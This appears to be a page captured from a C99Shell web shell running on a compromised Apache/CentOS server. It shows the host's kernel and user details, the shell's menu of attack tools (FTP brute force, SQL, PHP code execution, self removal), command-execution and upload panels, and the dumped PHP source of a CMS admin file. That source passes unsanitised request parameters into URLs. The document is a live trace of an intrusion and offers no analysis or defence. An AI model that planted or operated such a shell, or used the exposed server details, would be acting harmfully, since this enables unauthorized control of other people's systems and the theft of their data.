!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/site/ipanel/view/   drwxr-xr-x
Free 9.41 GB of 93.48 GB (10.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     frameNoticia.php (3.39 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 *  iPanel Control Admin 3.0
 *  index.php
 *  Arquivo de Mostra de dados do Sistema
 *
 *  Pertencente ao pacote admin.view
 *
 *  Copyright (C) 2011  iMAXIS Soluções Digitais Ltda
 *  Autor: Cledson Lodi
 *
 *  Criado em 06/09/2011
 */
   
session_start();
   require_once(
"../app/core/config.php");
   require_once(
APP_PATH."/cms/restritoIPanel.php");
   require_once(
APP_PATH."/cms/functions.php");
   require_once(
APP_PATH."/cms/IPanelApp.php");
   require_once(
APP_PATH."/util/Util.php");
   require_once(
APP_PATH."/util/Data.php");

   
$util = new Util();
   
$data = new Data();

   
$ipanel = new IPanelApp();
   
$ipanel -> setMode("Lista");           // seta o modo da classe (Lista - Form)
   
$ipanel -> setArea("Noticia");       // seta o local atual a ser mostrado
   
$ipanel -> setConfig();
   
$ipanel->setMenu();
   include 
"modTopViewFrame.php";
   
$parameters.= "&search=".$_GET['search']."&field=".$_GET['field']."&relationField=".$_GET['relationField']."&labelField=".$_GET['labelField'];
   
$parametersUrl.= "&search=".$_GET['search']."&field=".$_GET['field'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Ipanel</title>
<link href="css/style.css" rel="stylesheet" type="text/css" />
<script src="../js/funcoes.js"   type="text/javascript" language="javascript"></script>
<style>
    body{
        background-color: #FFFFFF !important;
        background-image: none !important;
        background-repeat: repeat-y repeat-x !important;
}
</style>
</head>
<script src="../js/busca.js"  type="text/javascript" language="javascript"></script>
<script type="text/javascript" language="javascript">
    function select(value, label){
        window.parent.addNoticia(value, label);
    }
</script>
<body>
<div class="lt" style="padding:0px!important; padding-top:5px !important">
    <div class="lt_topo">
        <?=  $ipanel->getImage() ?>
        <div class="lt_menu_topo">
            <h1><?=  $ipanel->getCurrentTitle() ?></h1>
            <ul><?=  $ipanel->getCurrentDescription() ?></ul>
        </div>
         <div class="clear"></div>
        <div id="statusRegistro" class="status_search">
            <h3>Busca de registros em <?=  $ipanel->getCurrentAlias() ?></h3>
            <?=  $ipanel->writeStatusOptions() ?>
            <?=  $ipanel->writeSearchForm($fieldSearch$valueIniRetorno$valueEndRetorno$_GETtrue?>
            <div class="clear"></div>
        </div>
    </div>
</div>
<div class="lt" style="padding:0px!important;background-color: #FFFFFF">
    <div class="tool_list_top">
    </div>
    <div class="list_full">

        <form name="FormLista" action="../app/cms/processa.php?lc=<?=  $ipanel->getArea() ?><?=  $parametersUrl ?>" enctype="multipart/form-data" method="post" onSubmit="return Confirma()">
        <input type="hidden" name="prm" value="<?=  $ipanel->parametrosAdd ?>"/>
        <input type="hidden" name="action" value="DeleteList"/>

  <?
     
/**
      *  Gera o grid dinamicamente
      *
      */
      
print $ipanel->writeGridPopUpSearch($arrayList$parametersUrl"id""titulo");
  
?>

        </form>
    </div>
   <? //include ("modPaginacao.php") ?>
    </div>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0031 ]--